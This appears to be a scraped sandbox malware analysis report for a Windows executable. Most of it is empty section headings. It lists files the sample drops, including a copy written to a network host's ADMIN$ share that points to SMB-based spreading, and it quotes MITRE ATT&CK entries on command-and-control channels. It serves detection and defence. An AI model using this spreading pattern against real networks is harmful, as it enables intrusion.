Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\SMB.exe

C:\ProgramData\X64.dll

C:\ProgramData\X86.dll

C:\ProgramData\spread.txt

C:\ProgramData\spread.txt:Zone.Identifier

C:\ProgramData\syabcd.exe

\Device\Mup\192.168.2.5\ADMIN$\spread.txt

\Device\Mup\192.168.2.5\PIPE\srvsvc

Static File Info

General

File Icon

Windows Analysis Report
x00zm3KVwb.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre